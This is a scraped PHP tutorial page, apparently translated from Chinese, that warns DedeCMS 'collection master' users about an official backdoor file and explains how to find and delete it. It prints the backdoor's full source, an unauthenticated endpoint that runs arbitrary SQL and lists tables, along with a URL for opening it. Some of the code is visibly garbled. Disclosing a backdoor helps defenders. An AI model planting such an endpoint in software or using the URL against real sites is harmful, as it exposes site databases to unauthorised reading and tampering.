How to delete official backdoors left by DEDE collection master_PHP tutorial

How to remove the official backdoor: After installing the collection master, please immediately delete the dedesql.query.php file in the include directory. If it has already been installed, the file may have been renamed arc.sqlquery.class.php. Find and delete it. . This file can be used to query the website database without login verification, and perform operations such as updating, deleting, and querying data. You can also test by yourself whether it is as I said, the method is:
http://your domain name.com/include/dedesql.query.php.php?dopost=viewinfo
Enter the above URL to open it Backdoor interface.
To be honest, the best way is not to use programs that intentionally leave backdoors. This backdoor has been discovered, and God knows whether more backdoors will appear in the next so-called new version. The code for this backdoor file is as follows:

Copy the code The code is as follows:

require_once(dirname(__FILE__)."/../include/common.inc.php");
if(emptyempty($dopost))
{
$dopost = "";
}
if($dopost=="rename")
{
if(rename('dedesql.query.php','arc.sqlquery.class.php')){
echo "成功！";
}else{
echo "失败！";
}
exit();
}
if($dopost=="viewinfo")
{
if(emptyempty($tablename))
{
echo "没有指定表名！";
}
else
{
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);
$dsql->Execute('me');
$row2 = $dsql->GetArray('me',MYSQL_BOTH);
$ctinfo = $row2[1];
echo "".trim($ctinfo)."";
}
exit();
}
if($dopost=="index")
{
require_once(DEDEINC.'/arc.partview.class.php');
$envs = $_sys_globals = array();
$envs['aid'] = 0;
$pv = new PartView();
$row = $pv->dsql->GetOne('Select * From `dede_homepageset`');
$templet = str_replace("{style}",$cfg_df_style,$row['templet']);
$homeFile = dirname(__FILE__).'/'.$row['position'];
$homeFile = str_replace("//","/",str_replace("\","/",$homeFile));
$fp = fopen($homeFile,'w') or die("无法更新网站主页到：$homeFile 位置");
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet;
$pv->SetTemplet($tpl);
$pv->SaveToHtml($homeFile);
$pv->Close();
echo "成功更新首页！";
exit();
}
else if($dopost=="query")
{
$sqlquery = trim(stripslashes($sqlquery));
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery))
{
echo "删除'数据表'或'数据库'的语句不允许在这里执行。";
exit();
}
if(eregi("^select ",$sqlquery))
{
$dsql->SetQuery($sqlquery) );
$dsql->Execute();
if($dsql->GetTotalRow()<=0)
{
echo "Run SQL: {$sqlquery}, None Return to record! ";
}
else
{
echo "Run SQL: {$sqlquery}, there are ".$dsql->GetTotalRow()." records, a maximum of 100 records are returned! ";
}
$j = 0;
while($row = $dsql->GetArray())
{
$j++;
if($j>100 )
{
break;
}
echo "

---

";
echo "Record: $j";
echo "

---

";
foreach($row as $k=>$v)
{
echo "{$k}：{$v}
rn";
}
}
exit();
}
if ($querytype==2)
{
$sqlquery = str_replace("r","",$sqlquery);
$sqls = split(";[ ​​t]{0,}n", $sqlquery);
$nerrCode = "";$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if( $q=="")
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError() );
if($errCode=="")
{
$i++;
}
else
{
$nerrCode .= "Execute: $q Error, error message: ".$errCode."
";
}
}
echo "{$i} SQL statements were successfully executed!

";
echo $nerrCode;
}
else
{
$dsql->ExecuteNoneQuery($sqlquery);
$nerrCode = trim ($dsql->GetError());
echo "1 SQL statement successfully executed!

";
echo $nerrCode;
}
exit();
}
if($dopost=="view")
{
;echo '

SQL命令运行器：

数据备份 | 数据还原

系统的表信息：

'; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " ".$row[0]."(".$dd.")\r\n"; } ;echo '

返回信息：

运行SQL命令行：

单行命令（支持简单查询）

多行命令

';}
?>

http://www.bkjia.com/PHPjc/322870.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/322870.htmlTechArticle去除官方后门方法：安装好采集大师后，请立即删除 include目录下的dedesql.query.php文件，如已经安装过，有可能文件已被改名为arc.sqlquery.cl...